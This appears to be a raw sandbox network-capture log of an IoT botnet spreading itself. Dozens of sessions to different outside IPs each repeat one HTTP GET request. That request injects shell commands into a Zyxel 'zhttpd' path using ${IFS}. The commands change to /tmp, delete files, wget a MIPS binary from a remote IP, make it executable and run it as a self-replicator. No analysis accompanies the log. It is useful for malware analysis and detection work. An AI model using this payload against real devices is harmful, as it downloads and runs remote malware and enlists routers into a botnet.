                                                Jan 12, 2024 18:24:52.263046026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8693192.168.2.1334994183.192.181.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263119936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8694192.168.2.1351758131.235.93.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263192892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8695192.168.2.135765657.118.151.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263254881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8696192.168.2.13475465.58.177.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263314962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8697192.168.2.1357220158.233.184.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263390064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8698192.168.2.133281838.172.209.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263436079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8699192.168.2.133972061.25.32.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263514996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8700192.168.2.1349116220.139.106.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263546944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8701192.168.2.135869624.81.202.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263611078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8702192.168.2.1333832121.52.34.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263684988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8703192.168.2.133861469.70.56.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263721943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8704192.168.2.1357162135.80.217.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263772964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8705192.168.2.1351952168.166.181.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263823032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8706192.168.2.136093247.152.72.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263871908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8707192.168.2.1340318105.97.46.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.263942957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8708192.168.2.1358640191.206.148.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264014006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8709192.168.2.133530263.255.79.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264059067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8710192.168.2.1334726198.74.195.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264113903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8711192.168.2.134550069.58.121.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264175892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8712192.168.2.1358806187.119.246.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264245033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8713192.168.2.1339788183.121.253.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264296055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8714192.168.2.1360028147.12.106.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264369965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8715192.168.2.1340606202.158.198.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264405012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8716192.168.2.135909471.13.64.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264461994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8717192.168.2.134198234.103.7.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264511108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8718192.168.2.1336060204.69.228.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264568090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8719192.168.2.1349558139.42.217.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264616966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8720192.168.2.1344088139.67.227.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264694929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8721192.168.2.1334288216.247.80.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264756918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8722192.168.2.133723844.244.205.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264803886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8723192.168.2.1346056159.92.28.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264853954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8724192.168.2.134050418.21.145.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.264895916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8725192.168.2.13333082.142.42.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.270256042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8726192.168.2.1359014169.131.160.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.270301104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8727192.168.2.1332938156.50.86.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.270364046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8728192.168.2.136045046.111.241.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.270421982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8729192.168.2.1337664149.247.196.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.275777102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8730192.168.2.1351962115.68.60.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.275855064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8731192.168.2.1356810158.131.80.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.275933981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8732192.168.2.1351794133.8.87.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276000023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8733192.168.2.1336922176.137.29.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276029110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8734192.168.2.13522505.55.182.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276072025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8735192.168.2.1342374123.0.190.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276148081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8736192.168.2.1333472181.139.226.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276192904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8737192.168.2.134650497.80.36.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276253939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8738192.168.2.13605341.239.190.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276318073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8739192.168.2.13370921.78.172.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276360989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8740192.168.2.1349886217.101.204.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276436090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8741192.168.2.134692823.144.26.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276469946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8742192.168.2.1336552175.30.205.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276557922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8743192.168.2.1340120143.210.30.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276587963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8744192.168.2.134446885.32.22.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276622057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8745192.168.2.134518690.119.129.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276683092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8746192.168.2.135267060.50.241.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276766062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8747192.168.2.136000851.203.246.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276820898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8748192.168.2.1342266138.61.35.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276875019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8749192.168.2.1357068211.8.84.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276920080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8750192.168.2.1360136221.180.147.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.276994944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8751192.168.2.1336204137.203.205.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277051926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8752192.168.2.1349264110.171.210.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277081966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8753192.168.2.1355520109.6.126.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277143002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8754192.168.2.1358110199.153.212.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.277199030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8755192.168.2.134656088.226.193.172443
                                                TimestampBytes transferredDirectionData
